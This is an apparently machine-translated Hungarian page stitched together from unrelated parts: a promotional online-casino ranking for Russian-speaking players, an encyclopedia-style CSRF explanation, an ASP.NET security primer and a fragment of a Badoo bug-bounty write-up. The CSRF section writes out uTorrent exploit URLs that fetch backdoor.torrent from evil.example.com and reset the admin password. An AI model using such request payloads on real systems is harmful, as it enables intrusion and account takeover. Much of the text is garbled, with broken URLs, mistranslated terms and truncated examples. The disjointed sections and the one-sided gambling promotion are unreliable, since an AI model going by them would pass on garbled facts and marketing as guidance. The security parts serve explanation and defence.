A megbízható és becsületes online kaszinók megtalálása sok szabadidőt igényel, különösen, ha kezdőkről van szó. Fel kell mérni a játékklub átláthatóságát, hírnevét a hálózatban, a többi felhasználó véleményét, a fizetések sebességét és sok más tevékenységi tényezőt. Hogy megmentsük a játékosokat ettől a sorstól, összeállítottunk kaszinó minősítés , amelyeket alaposan teszteltek, és megerősítették saját becsületességüket és a nyerőgépek jó megtérülését.

A legjobb kaszinók rangsora

Többé nem kell személyes időt töltenie az intézmény megbízhatóságának ellenőrzésével. A tapasztalt szerencsejáték -elemzők, akik havonta tucatnyi órát töltenek kaszinókban, saját objektív értékelést készítettek a szerencsejáték -klubok munkájáról. Több száz létesítményt elemeztek annak érdekében, hogy végül a felhasználóknak a legjobb platformokat kínálhassák az interneten.

A klubok kezdeti listája meglehetősen nagy volt, de az elemzés során kétes és megbízhatatlan létesítmények tűntek el. Például a hamis licenc megléte, a résidőkre vonatkozó tanúsítványok hiánya, a szerver helyettesítése a játékgépben és még sok más figyelmeztetésként szolgál a szakértők számára. Még egy olyan tényező is, amely lehetővé teszi, hogy kételkedjen a kaszinó őszinteségében, kizáró ok a minősítésből.

A szerencsejáték -platformok felületes elemzése mellett az internetes létesítményekkel kapcsolatos információkat is ellenőrzik. Az elemzés során figyelembe vesszük az online hírnevet, a jelenlegi és korábbi játékosok véleményét, a konfliktushelyzetek jelenlétét, a kaszinókkal kapcsolatos botrányokat és az alkotók problémamegoldási módjait. Különös figyelmet fordítanak a legfeljebb 1-2 éves munkatapasztalattal rendelkező fiatal klubokra.

Hogyan állítják össze a kaszinó besorolását, és ki kerül oda?

Az alkotáshoz engedélyezett kaszinók minősítésetöbb mint 10 éves iparági tapasztalattal rendelkező tapasztalt szerencsejátékosokat és elemzőket vonzunk. Tudásuknak köszönhetően könnyen kiszűrhetik a csalárd klubokat, majd alaposan elemezhetik a fennmaradó létesítményeket. Az eredmény egy kis lista a megbízható kaszinókról, ahol biztonságosan játszhat, félelem nélkül az eredmények őszintesége és a kifizetések miatt.

• a szerencsejáték -felügyeleti hatóság engedélye és a regisztrációhoz választott joghatóság;
• platformbiztonság, amely garantálja az adatok és a fizetési információk bizalmasságát;
• licencelt szoftverek kiválasztása megbízható szolgáltatóktól, akiknek munkájába lehetetlen beavatkozni;
• az orosz nyelvű verzió rendelkezésre állása az orosz és a FÁK-országok felhasználóinak nagyobb kényelme érdekében;
• támogató szolgálat, beleértve munkájának ütemezését, a válaszok gyorsaságát, a problémamegoldás minőségét;
• a pénz felvétele további késedelmek vagy ellenőrzések nélkül, valamint a pénz átvételének lehetőségei és a tranzakciók feldolgozásának gyorsasága;
• bónusz programok új és rendszeres felhasználók számára, versenyek, lottók, időszakos promóciók jelenléte;
• olyan fizetési rendszerek, amelyek befolyásolják az ügyfelek kényelmét a számla feltöltésére és a nyeremények visszavonására.

Ez csak egy kis lista a tényleges követelményekről, amelyeket szakértők értékelnek. Minden kritérium megkapja saját fontossági tényezőjét, amelyet figyelembe vesznek a végeredmény összegzésekor.

Mi az engedélyezett kaszinó?

Kaszinó minősítés , amely a szerencsejáték -platformok munkájának őszinteségéről és átláthatóságáról tanúskodik, kizárólag olyan létesítményekből állhat, amelyek érvényes tevékenységi engedéllyel rendelkeznek. A jogi kluboknak engedélyt kell szerezniük a hatósági ellenőrzésen, és meg kell felelniük minden előírásnak.

A licenc puszta megemlítése az oldalon nem elegendő. A szakértők megértik, hogy a csalók emblémákat használhatnak a naiv felhasználók megtévesztésére, ezért önállóan elemzik az információkat. Ehhez lépjen a szabályozó hivatalos webhelyére, és erősítse meg az információkat a dokumentum számával vagy a jogi személy nevével. Ha nincs licenc információ, akkor ez hamisítvány.

Az elemzők technikai elemzéseket is használnak a licencelt szoftverek ellenőrzésére. Fejlesztői eszközök segítségével hozzáférnek az adatátviteli szerverre vonatkozó információkhoz. Ha a kaszinó a szoftver szolgáltató hivatalos portálját használja, akkor a szoftver tisztességes és törvényes. Ez azt jelenti, hogy nem avatkozhat a munkájába, és nem módosíthatja a végeredményt.

Hogyan határozzák meg a kaszinó igazságosságát?

Elég nehéz önállóan felmérni egy játékklub becsületességét, amely a rendelkezésre álló erőforrások és ismeretek mennyiségével függ össze. Mielőtt az intézmények bekerülnének aőszinte kaszinó minősítés, az elemzők számos tényezőt alaposan ellenőriznek:

• azok a régiók, ahonnan a játékosokat elvitték, mivel a tiltott joghatóságok sokat beszélnek;
• visszavonási korlátok, az egyszeri tranzakciók korlátozása, valamint a tranzakciók napi, heti és havi összege;
• a KYC -re és az AML -re vonatkozó információk elérhetősége, amelyek jelzik a pénz származásának becsületességére és törvényességére vonatkozó jogszabályok követelményeinek való megfelelést;
• hírnevét, amely megerősíti a klub őszinteségét és megbízhatóságát, valamint a nagy horderejű botrányok vagy problémák hiányát;
• a munka időtartama, amely lehetővé teszi az online erőforrás történetének teljes felmérését, beleértve az összes előnyt és hátrányt;
• a szabályozó jelenléte és annak szabályainak való megfelelés, ami növeli a tevékenység igazságosságának esélyeit.

Az engedély és a szabályozó meglehetősen fontos kritériumok, de ez nem jelent 100% -os garanciát az őszinteségre. Csak azok a klubok számíthatnak ilyen címre, amelyek lehetővé tették, hogy a játékosok nagy nyereményeket és jackpotokat szerezzenek, ajándékokat adtak a lottókra és a versenyekre.

Nyerőgépek változatai

A résidők, gépek és más típusú szerencsejátékok sokasága sokat elárul az intézményről. Egyes klubok csak néhány szoftverszolgáltatóval működnek együtt, de népszerű és új játék ajánlatokat kapnak tőlük, míg mások bővítik a partnerségi megállapodások hálózatát, és rengeteg márkát hívnak meg együttműködésre. Minél több gépet mutatnak be a játékplatformon, annál könnyebben választhatja ki az ügyfél a neki tetsző nyerőgépet.

De engedélyezett kaszinók minősítésenem csak a játékok sokféleségét, hanem azok minőségét is figyelembe veszi. A megbízható szerencsejáték -létesítmények kizárólag engedéllyel rendelkező szoftvereket használnak, amelyek őszinteségét és biztonságát tesztelték. Az ilyen gépek akár 98%-os hozammal is számolhatnak, és nem zavarhatja munkájukat, és nem módosíthatja az eredmények generálásának algoritmusát.

Őszintén szólva minden webhely célja a nyereség. Még ha az egyik játékos megnyeri is a főnyereményt, hosszú távon az intézmény továbbra is feketében marad. De csak a becsületes klubok teszik lehetővé a felhasználók számára, hogy nagy jackpotot szerezzenek, és valódi számlára vonják vissza. Ez különbözteti meg az engedélyezett online kaszinókat a csalárd projektektől.

Bónusz politika

Hozzon létre egy kaszinó minősítést lehetetlen a bónuszpolitika figyelembevétele nélkül. Minden szerencsejáték klub promóciókat és ajándékokat használ új ügyfelek vonzására és meglévő ügyfelek megtartására. De néhány létesítmény meglehetősen ravaszul cselekszik, rejtett feltételeket teremtve a fogadásokhoz vagy az időbeli elhatárolásokhoz, irreális feltételeket szabva a fogadásnak az x60-100 közötti tartományban, amelyeket szinte lehetetlen teljesíteni.

A szokásos ösztönzők a következő kategóriákból állnak:

1. Nincs befizetési bónusz az új ügyfelek fogadására - jóváírják az e -mail cím és a telefonszám megerősítéséért. Jutalomként ingyenes pénzt vagy ingyenes pörgetést használnak a kötelező fogadási kötelezettségű nyerőgépeken.
2. Regisztrációs ajándék - ingyenes pörgetések vagy a számla feltöltésének összegének szorzói 1-5 befizetéshez a személyes profil létrehozásától kezdve. A bónusz pontos összegét és a maximális korlátokat minden egyes klub egyénileg határozza meg.
3. Hűségprogram - különböző felhasználói státuszrendszerek, amelyek befolyásolják a heti cashback méretét, a személyes szolgáltatási feltételek elérhetőségét, az egyedi ajándékokat, a helyi pénznem kedvező árfolyamát a pénzért és még sok mást.
4. A promóciós kódok szerencsejáték -klubok időszakos promóciói, amelyek ingyenes pörgetésekhez ajándékutalványokat, betétet vagy számlaszorzót adnak ki mindenkinek.

Orosz nyelvű kaszinók

Kitalálás a legjobb kaszinók értékelése 2020 -ban, figyelembe veszik az orosz nyelv jelenlétét a platformon. Az orosz nyelvű felület lehetővé teszi az Oroszországból, Fehéroroszországból, Ukrajnából és a FÁK-országokból érkező felhasználók számára, hogy könnyen kezeljék a regisztrációt, a bejelentkezést, a fiókok feltöltését és a platform egyéb funkcióit. Azt is megerősíti, hogy az intézmény az oroszul beszélő felhasználókra összpontosít, egyedi bónuszokat és támogatást kínálva számukra.

A támogató szolgálat munkáját figyelembe veszik. A legtöbb szerencsejáték klub kizárólag angol nyelven nyújt segítséget ügyfeleinek, ami bonyolítja a kommunikációs folyamatot. Fordítást kell igénybe vennie, vagy hozzáértő emberekkel kell kapcsolatba lépnie a kérés összeállításához és a támogatási válasz megértéséhez. Ezért a minősítés csak azokat az online klubokat tartalmazza, amelyek tanácsokat adnak az ügyfeleknek a támogató beszélgetésekben és telefonon oroszul.

A kaszinó orosz nyelvű kezelőfelülete lehetővé teszi, hogy könnyedén megértse a platform felhasználói szabályait, tanulmányozza a bónuszajánlatokat és azok időbeli elhatárolásának jellemzőit, fogadást, részt vegyen versenyeken és lottójátékokon, anélkül, hogy kétségei lennének a műveletek helyességéről.

Gyors cash out kaszinók

Különös figyelmet fordítanak az online kaszinók fizetési sebességére. Egyes klubok néhány órán belül felajánlják a bankkártyák és e-pénztárcák felvételét, a VIP ügyfelek pedig azonnal feldolgozzák a kéréseket. Mások a kérelmek manuális feldolgozását munkanapokon, speciális ütemterv szerint használják, így a kifizetések a kérelem benyújtásától számított 1-3 munkanapig késhetnek. Létrehozta a felhasználókat, hogy megmentse őket a hosszú várakozási időktőlkaszinó minősítés gyors visszavonással.

Kizárólag azokból az intézményekből áll, amelyek azonnal felülvizsgálják az összes kérelmet, és nem akadályozzák a pénz fogadását. Nem csak az átutalások sebességét veszik figyelembe, hanem azt is, hogy nincsenek problémák, ha nagy fizetéseket vagy pénzátutalásokat kérnek egy jackpot, egy nagy jackpot megnyerése után. Csak a becsületes intézmények garantálhatják a tisztességes kifizetéseket, és nem okozhatnak problémákat a kifizetésekkel.

Elemzi a betétekre és a pénzkérésre rendelkezésre álló fizetési rendszereket is. A szabványos webhelyek minimális számú módot támogatnak, de a progresszív klubok folyamatosan elemzik a trendeket az új technikai megoldások integrálása érdekében.

Az online kaszinók fő fizetési rendszerei:

• bankkártyák MIR, MasterCard, Visa;
• elektronikus pénztárcák QIWI, Yandex, Webmoney, Neteller, Skrill és mások;
• mobil fizetések Beeline, MegaFon, MTS, TELE2;
• Orosz internetbank;
• népszerű kriptovaluták, köztük Bitcoin, Ethereum, Litecoin.

Ügyfélszolgálat

Fontos tényező, amelyet figyelembe vettek a létrehozás soránőszinte kaszinó minősítés- az ügyfélszolgálat elérhetősége és munkájának minősége. A megbízható intézmények gondoskodnak saját ügyfélkörükről, ezért speciális telefonvonalakat és online csevegéseket szerveznek a felhasználók kérdéseinek gyors megválaszolása és problémáik megoldása érdekében.

Az elemzők telefonvonalakat, élő csevegéseket és e -mail kapcsolatokat használtak a támogatás elemzéséhez. A nap különböző szakaszaiban a helyszín munkatársai különféle kérdéseket vagy kéréseket kaptak a technikai problémák kezelésére. Ezt követően értékelték munkájuk minőségét, amely a következő tényezőket foglalta magában:

• a válaszadás gyorsasága;
• a tanácsadó megoldja -e a problémát, és mennyi ideig tartott;
• a válaszok írástudása és az oroszul beszélő alkalmazottak támogatottsága.

Ha a kaszinónak nincsenek oroszul beszélő operátorai, javasoljuk a Google online fordítójának használatát a tanácsadók kérdéseinek és válaszainak lefordításához.

következtetéseket

Mielőtt regisztrálna egy online klubba, elemeznie kell munkájának megbízhatóságát, átláthatóságát, valamint ellenőriznie kell a hírnevet és a véleményeket a hálózaton. Ehelyett javasoljuk a használatátőszinte kaszinó minősítéstapasztalt szerencsejátékosok állították össze. Saját tapasztalataik alapján tucatnyi gyanús szerencsejáték -klubot utasítottak el, így a listán hagyták a 2020 legjobb létesítményeinek listáját.

Webhelyek közötti hamisítási kérelem más néven egy kattintásos támadás vagy vezetési ülésés rövidítve CSRF(néha kimondják árapály furat) vagy XSRF, egy olyan típusú rosszindulatú program, amelyet egy olyan webhelyről használnak ki, ahol jogosulatlan parancsokat küld a felhasználó, akiben a webalkalmazás megbízik. Egy rosszindulatú webhely számos módon továbbíthatja az ilyen parancsokat; a speciálisan kialakított képcímkék, rejtett űrlapok és a JavaScript XMLHttpRequests például mind működhetnek felhasználói beavatkozás vagy akár tudás nélkül. Ellentétben az oldalak közötti szkriptezéssel (XSS), amely a felhasználó bizalmát használja egy adott webhelyhez, a CSRF kihasználja azt a bizalmat, amelyet a webhely bíz a felhasználó böngészőjében.

történelem

A CSRF sebezhetőségei ismertek, és bizonyos esetekben 2001 óta kihasználják őket. Mivel az IP -címet a felhasználó adja meg, előfordulhat, hogy egyes webhelynaplók nem rendelkeznek CSRF -bizonyítvánnyal. A kizsákmányolások aluljelentettek, legalábbis nyilvánosan, és 2007-ig számos jól dokumentált példa volt:

• A Netflix webhelye 2006 -ban számos CSRF sebezhetőséget tartalmazott, amelyek lehetővé tehetik a támadó számára, hogy olyan műveleteket hajtson végre, mint például DVD hozzáadása az áldozat bérleti sorához, a szállítási cím megváltoztatása egy fiókban, vagy az áldozat bejelentkezési adatainak megváltoztatása a fiók teljes veszélyeztetése érdekében.
• Az ING Direct online banki webalkalmazás sebezhető volt a CSRF támadásokkal szemben, amelyek lehetővé tették az illegális pénzátutalásokat.
• 2008 -ban a YouTube népszerű videós webhelye is kiszolgáltatott volt a CSRF -nek, és ez lehetővé tette, hogy a támadó gyakorlatilag minden felhasználó műveleteit elvégezze.
• A McAfee szintén érzékeny a CSRF -re, lehetővé téve a támadók számára, hogy megváltoztassák vállalati rendszerüket.

2018 -ban új támadásokat hajtottak végre a webes eszközök ellen, beleértve az útválasztók DNS -beállításainak módosítását. Számos útválasztó -gyártó sietve kiadott egy firmware -frissítést a biztonság javítása érdekében, és azt tanácsolta a felhasználónak, hogy módosítsa az útválasztó beállításait a kockázat csökkentése érdekében. A részleteket "nyilvánvaló biztonsági okokra" hivatkozva nem hozták nyilvánosságra.

Példa és jellemzők

Azok a támadók, akik megtalálják a céloldalon meghatározott műveletet végrehajtó reprodukálható linket, miközben az áldozat regisztrál, beágyazhatnak egy ilyen linket az általuk irányított oldalra, és becsaphatják az áldozatot annak megnyitására. A támadáshordozó linkje elhelyezhető egy olyan helyen, ahová az áldozat valószínűleg meglátogat, ha belép a céloldalra (például fórumbeszélgetés), vagy elküldhető HTML e -mail törzsben vagy mellékletben. Az Utorrent valódi CSRF biztonsági rése (CVE-2008-6586) kihasználta azt a tényt, hogy webkonzolja elérhető a helyi gazdagépen: 8080 lehetővé tette a kritikus műveletek végrehajtását egyszerű GET kéréssel:

A .torrent fájl letöltésének kényszerítése http: // local: 8080 / GUI / action = URL hozzáadása & s = http: //evil.example.com/backdoor.torrent Utorrent adminisztrátori jelszó módosítása HTTP: // local: 8080 / gui / action = setetting & s = webui.password & v = eviladmin

A támadásokat azzal indították, hogy rosszindulatú, automatikus HTML -képelemeket tettek közzé a fórumokon és spamelt e -maileket, hogy az ezeket az oldalakat látogató böngészők automatikusan megnyithassák azokat, anélkül, hogy a felhasználó beavatkozna. Azok az emberek, akik az Utorrent sebezhető verzióját futtatják, miközben megnyitják ezeket az oldalakat, kiszolgáltatottak voltak a támadásnak.

A képcímkéket használó CSRF támadások gyakran online fórumokról történnek, ahol a felhasználók képeket tehetnek közzé, de nem JavaScriptet, például a BBCode használatával:

Http: // localhost: 8080 /gui /? Action = add-url & s = http: //evil.example.com/backdoor.torrent

Amikor a localhost: 8080 helyi Utorrent alkalmazásában támadási hivatkozást ér el, a böngésző is automatikusan automatikusan elküldi az adott tartományhoz tartozó meglévő cookie -kat. A webböngészők ezen közös tulajdonsága lehetővé teszi a CSRF támadások számára, hogy kihasználják a megcélzott biztonsági réseiket, és ellenséges műveleteket hajtsanak végre mindaddig, amíg a felhasználó a támadás idején bejelentkezett a cél weboldalra (ebben a példában a helyi Utorrent webes felületre).

A webhelyek közötti hamisítási kérelem zavaros proxy-támadás egy webböngésző ellen.

A CSRF jellemzően a következő jellemzőkkel rendelkezik:

• Olyan webhelyeket tartalmaz, amelyek a felhasználó személyazonosságára támaszkodnak.
• A webhely ezen identitásba vetett bizalmát használja fel.
• Csalja a felhasználó böngészőjét, hogy HTTP -kéréseket küldjön a céloldalra.
• Tartalmaz HTTP -kéréseket, amelyeknek mellékhatásai vannak.

HTTP igék és CSRF

• A HTTP GET -ben a CSRF kihasználása triviális a fent leírt technikák használatával, például egy egyszerű hiperhivatkozással, amely manipulált paramétereket tartalmaz, és automatikusan betöltődik az IMG címke használatával. A HTTP specifikáció szerint azonban a GET -t biztonságos módszerként kell használni, azaz anélkül, hogy jelentősen megváltoztatná a felhasználó állapotát az alkalmazásban. Azoknak az alkalmazásoknak, amelyek GET -t használnak ilyen műveletekhez, HTTP POST -ra kell váltaniuk, vagy CSRF -védelmet kell használniuk.
• A HTTP POST különböző sérülékenységekkel rendelkezik a CSRF -től, a részletes használati forgatókönyvektől függően:
  • A legegyszerűbb formában a POST lekérdezési karakterláncként kódolt adatokkal (mező1 = érték1 és mező2 = érték2) A CSRF támadások egyszerűen megvalósíthatók egy egyszerű HTML űrlap használatával, és CSRF-ellenes intézkedéseket kell alkalmazni.
  • Ha az adatokat bármilyen más formátumban (JSON, XML) küldik, a szokásos módszer az, hogy POST kérést adnak ki XMLHttpRequest használatával, az SOP által megakadályozott CSRF támadásokkal; létezik módszer tetszőleges tartalom egyszerű HTML -űrlapról történő beküldésére az ENCTYPE attribútum használatával; egy ilyen hamis kérés megkülönböztethető a legitimektől a szöveges / egyszerű tartalomtípussal, de ha nem a szerveren hajtják végre, akkor CSRF végrehajtható
• más HTTP módszerek (PUT, DELETE, stb.) csak XMLHttpRequest használatával adhatók ki SOP és CSRF megelőzéssel; Ezek az intézkedések azonban nem lesznek aktívak azokon a webhelyeken, amelyek kifejezetten letiltják őket az Access-Control-Allow-Origin használatával: * fejléc

A CSRF egyéb megközelítései

Ezen túlmenően, bár jellemzően statikus támadástípusként írják le, a CSRF dinamikusan építhető fel a hasznos terhelés részeként a webhelyek közötti támadási forgatókönyvekben, amint azt a Samy féreg is mutatja, vagy menet közben épülhet fel az off-outon keresztül kiszivárgott munkamenet-információkból. webhely tartalmát. és rosszindulatú URL -ként elküldi a célpontnak. A CSRF tokeneket a támadó kliens is küldheti munkamenet-rögzítés vagy más sebezhetőség miatt, vagy sejtheti egy nyers erővel végrehajtott támadással, amelyet rosszindulatú oldalra fordítanak, és több ezer sikertelen kérést generál. A "Dinamikus CSRF" támadási osztályt, vagy az egyes ügyfelek hasznos terhelésének felhasználását egy adott hamisítási munkamenethez, 2009 -ben írta le Nathan Hamiel és Sean Moyer a BlackHat tájékoztatóin, bár a rendszertan még szélesebb körben alkalmazandó.

Oren Ofer új vektort mutatott be a dinamikus CSRF támadások megfogalmazására az OWASP fejezet 2012. januári helyi ülésén - "AJAX Hammer - Dynamic CSRF".

Hatások

Súlyossági mutatókat tettek közzé a CSRF biztonsági résein, amelyek távoli kódfuttatáshoz vezetnek, superuser jogosultságokkal, valamint olyan biztonsági réssel, amely veszélyeztetheti a gyökértanúsítványt, amely teljesen aláásná a nyilvános kulcsú infrastruktúrát.

Korlátozások

A webhelyek közötti hamisítási kérelem sikeres végrehajtásához több dolognak kell történnie:

1. A támadónak vagy olyan webhelyet kell megcéloznia, amely nem ellenőrzi a hivatkozó fejlécét, vagy az áldozatot egy böngésző használatával, vagy egy olyan bővítményt, amely lehetővé teszi a hivatkozó hamisítását.
2. A támadónak meg kell találnia egy beküldési űrlapot a céloldalon, vagy egy URL -t, amelynek mellékhatásai vannak, valamit csinál (például pénzt utal, vagy megváltoztatja az áldozat e -mail címét vagy jelszavát).
3. A támadónak meg kell határoznia a helyes értékeket minden űrlaphoz vagy URL -bevitelhez; ha ezek közül bármelyiket titkos hitelesítési értékeknek vagy azonosítóknak kell feltételezniük, amelyeket a támadó nem fog tudni kitalálni, akkor a támadás nagy valószínűséggel nem képes rá (kivéve, ha a támadónak nagy szerencséje van kitalálni).
4. A támadónak csábítania kell az áldozatot egy rosszindulatú kódot tartalmazó weboldalra, miközben az áldozat regisztrál a céloldalon.

A támadás vak: A támadó nem láthatja, hogy a céloldal mit küld vissza az áldozatnak hamis kérésekre válaszul, hacsak nem kihasználják a webhelyek közötti szkriptet vagy más hibát a céloldalon. Ezenkívül a támadó csak akkor célozhat meg bármely linket, vagy küldhet be bármilyen űrlapot, amely az első hamisított kérés után érkezik, ha a későbbi linkek vagy űrlapok hasonlóan előre megjósolhatók. (Több cél is modellezhető úgy, hogy több képet is tartalmaz egy oldalon, vagy JavaScript használatával késleltetheti a kattintásokat.)

Tekintettel ezekre a korlátokra, a támadónak nehezére eshet megtalálni az áldozat névtelen vagy sebezhető beadványát. Másrészt a támadási kísérletek könnyen összeszerelhetők és láthatatlanok az áldozatok számára, az alkalmazásfejlesztők pedig kevésbé ismerik és nem készülnek fel a CS -támadásokra, mint mondjuk a szótár -támadások jelszavainak feltörésére.

megelőzés

A legtöbb CSRF -megelőzési technika úgy működik, hogy további hitelesítési adatokat fecskendez a kérésekbe, lehetővé téve a webes alkalmazás számára, hogy felismerje az illetéktelen helyekről érkező kéréseket.

Szinkronizáló marker modell

• Bejelentkezéskor a webalkalmazás beállít egy cookie -t, amely véletlenszerű tokent tartalmaz, amely változatlan marad a felhasználó munkamenetében

Set-Cookie: Csrf-token = i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; lejár = csütörtök, 2015. július 23., 10:25:33 GMT; Max-életkor = 31449600; Útvonal = /

• A JavaScript az ügyféloldalon fut, beolvassa az értéket, és bemásolja azt az egyes tranzakciós kérésekhez küldött egyéni HTTP fejlécbe

X-Csrf-token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql

• A szerver ellenőrzi a tokenek jelenlétét és integritását

Ennek a módszernek a biztonsága azon a feltételezésen alapul, hogy csak az azonos eredetű JavaScript képes olvasni a cookie jelentését. A JavaScript szélhámos fájlokkal működik, vagy az e -mail nem lesz képes olvasni és másolni egyéni fejlécbe. Annak ellenére, hogy a CSRF token sütik automatikusan el lesz küldve a szélhámos kérésből, a szerver továbbra is érvényes X-CSRF tokent vár cím .

A CSRF tokennek egyedinek és kiszámíthatatlannak kell lennie. Véletlenszerűen generálható, vagy a munkamenet -jogkivonatokból származtatható HMAC használatával:

Csrf_token = HMAC (session_token, application_secret)

A CS cookie -jelölő nem tartalmazhat HTTPOnly jelzőt, mivel azt JavaScript tervezéssel kell olvasni.

Ezt a technikát számos modern keretrendszer valósítja meg, mint például a Django és az AngularJS. Mivel a token a felhasználó munkamenetében állandó marad, jól működik az AJAX alkalmazásokkal, de nem biztosít eseménysorozatot a webalkalmazásokban.

A módszer által biztosított védelem veszélybe kerülhet, ha a cél webhely lekapcsol azonos származású politikáját az alábbi módszerek egyikével:

• Permissive Access-Control-Allow-Origin fejléc (argumentumcsillaggal)
• clientaccesspolicy.xml fájl, amely nem kívánt hozzáférést biztosít a Silverlight vezérlőhöz
• crossdomain.xml fájl, amely nem kívánt hozzáférést biztosít a flash filmekhez

Dupla küldés cookie

A cookie-fejléc megközelítéshez hasonlóan, de JavaScript nélkül a webhely beállíthatja a CSRF tokent cookie-ként, és beillesztheti azt egy rejtett mezőbe az ügyfél által küldött minden HTML-űrlapba. Az űrlap elküldésekor a webhely ellenőrizheti, hogy a cookie -jelző megegyezik -e a markerek alakjával. Az általános származási irányelv megakadályozza, hogy a támadó olvassa vagy beállítsa a cookie -kat a céltartományon, így nem tudják a megfelelő tokent megadni a létrehozott formában.

Ennek a módszernek az előnye a szinkronizációs mintával szemben, hogy a tokent nem kell tárolni a szerveren.

Vevői garanciák

Az olyan böngészőbővítmények, mint például a RequestPolicy (Mozilla Firefox esetén) vagy az Umatrix (Firefox és Google Chrome / Chromium esetén) megakadályozhatják a CSRF-t azáltal, hogy alapértelmezett megtagadási házirendet biztosítanak a webhelyek közötti kérelmekhez. Ez azonban jelentősen megzavarhatja számos webhely normál működését. A CsFire kiterjesztés (Firefoxhoz is) csökkentheti a CSRF hatását, és kevésbé befolyásolja a rendszeres böngészést, ha eltávolítja a hitelesítési információkat a webhelyek közötti kérésekből.

Az ASP.NET MVC nem a legnagyobb hype, de meglehetősen népszerű verem a webfejlesztők körében. Egy (anti) hacker szempontjából standard funkciói alapvető biztonságot nyújtanak, de extra védelemre van szükség a hacker trükkök túlnyomó többsége elleni védelemhez. Ebben a cikkben áttekintjük azokat az alapokat, amelyeket egy ASP.NET fejlesztőnek (legyen az Core, MVC, MVC Razor vagy Web Forms) tudnia kell a biztonságról.

Kezdjük az összes ismert támadástípussal.

SQL befecskendezés

Furcsa módon, de 2017-ben az injekció és különösen az SQL-befecskendezés az első helyen áll a "Top 10 OWASP biztonsági kockázat" (Open Web Application Security Project) között. Ez a fajta támadás azt jelenti, hogy a felhasználó által megadott adatokat a szerver oldalon használják lekérdezési paraméterként.

A klasszikus SQL befecskendezés példája inkább a Web Forms alkalmazásokra jellemző. A paraméterek lekérdezési értékként való használata segít a támadások elleni védelemben:

String commandText = "UPDATE Users SET Status = 1 WHERE CustomerID = @ID;"; SqlCommand parancs = new SqlCommand (commandText, connectionString); command.Parameters ["@ ID"]. Érték = ügyfél -azonosító;

Ha MVC alkalmazást fejleszt, akkor az Entity Framework lefed néhány biztonsági rést. Ahhoz, hogy egy MVC / EF alkalmazásban működő SQL injekciót kapjon, meg kell találnia. Ez azonban lehetséges, ha az ExecuteQuery használatával futtat SQL -t, vagy rosszul írt tárolt eljárásokat hív le.

Bár az ORM elkerüli az SQL befecskendezését (a fenti példák kivételével), javasoljuk, hogy az attribútumokat korlátozza azokra az értékekre, amelyeket a modellező mezők, tehát az űrlapok felvehetnek. Például, ha feltételezzük, hogy csak szöveg írható be egy mezőbe, akkor a Regex használatával adja meg a ^ + $ tartományt. És ha számokat kell beírni a mezőbe, akkor ezt jelezze követelményként:

Nyilvános karakterlánc Zip (get; set;)

A Webes űrlapokban korlátozhatja az értékeket validátorok használatával. Példa:

Mivel a .NET 4.5 webes űrlapok észrevétlen érvényesítést használnak. Ez azt jelenti, hogy nem kell további kódot írnia az űrlap értékének érvényesítéséhez.

Különösen az adatok érvényesítése segíthet megvédeni egy másik jól ismert biztonsági rést, az úgynevezett webhelyek közötti szkriptet (XSS).

XSS

Az XSS tipikus példája egy szkript hozzáadása egy megjegyzéshez vagy vendégkönyvbejegyzéshez. Így nézhet ki:

Ahogy elképzelheti, ebben a példában a webhelyéről származó cookie -kat paraméterként továbbítják valamilyen hacker erőforrásnak.

A Webes űrlapokban az alábbi kóddal hibázhat:

sajnálom<%= username %>de a jelszó rossz

Világos, hogy a felhasználónév helyett lehet egy szkript. A szkript végrehajtásának elkerülése érdekében legalább használhat egy másik ASP.NET kifejezést: amely kódolja annak tartalmát.

Ha Razor -t használunk, akkor a karakterláncok automatikusan kódolásra kerülnek, ami minimálisra csökkenti az XSS megvalósításának lehetőségét - a hacker csak akkor tudja megforgatni, ha durva hibát követ el, például a @ Html.Raw (Model.username) vagy használja az MvcHtmlString karakterláncot a modellben.

Az XSS elleni további védelem érdekében az adatokat C # kódban is kódolják. A NET Core rendszerben a következő kódolókat használhatja a System.Text.Encodings.Web névtérből: HtmlEncoder, JavaScriptEncoder és UrlEncoder.

A következő példa visszaadja a karakterláncot 6 7 8

Alapvetően, amikor az áldozat betöltötte az oldalt, kérést intéztek a Badoo -szkripthez, elvették az adott felhasználó rt paraméterét, majd az áldozat nevében tették meg a kérést. Ebben az esetben Mahmúd fiókját kapcsolta össze az áldozat fiókjával, ami lehetővé tette a fiók teljes átvételét.

következtetéseket

Ahol füst van, ott tűz van. Tehát helyesen feltételezte, hogy valahol meg lehet mutatni, hol lehet használni ebben az esetben egy js fájlban.

Eredmények

A CSRF támadások egy másik veszélyes vektort jelentenek a támadások számára, és végrehajthatók az áldozat aktív intézkedései vagy értesítés nélkül. A CSRF sebezhetőségeinek feltárása némi találékonyságot, és ismét hajlandóságot tesz mindenre.

Általában az űrlapokat alapértelmezés szerint olyan keretekkel védik, mint a Rails, ha a webhely POST -kérést küld, de az API -k képesek

legyen külön történet. Például a Shopify elsősorban a Ruby on Rails keretrendszerre épül, amely alapértelmezés szerint minden formához CSRF -védelmet nyújt (bár letiltható). Világos azonban, hogy ez nem feltétlenül áll fenn az ezzel a kerettel felépített API -k esetében. Végül figyeljen azokra a hívásokra, amelyek megváltoztatják a szerver adatait (például törlési művelet), és GET kérés használatával történnek.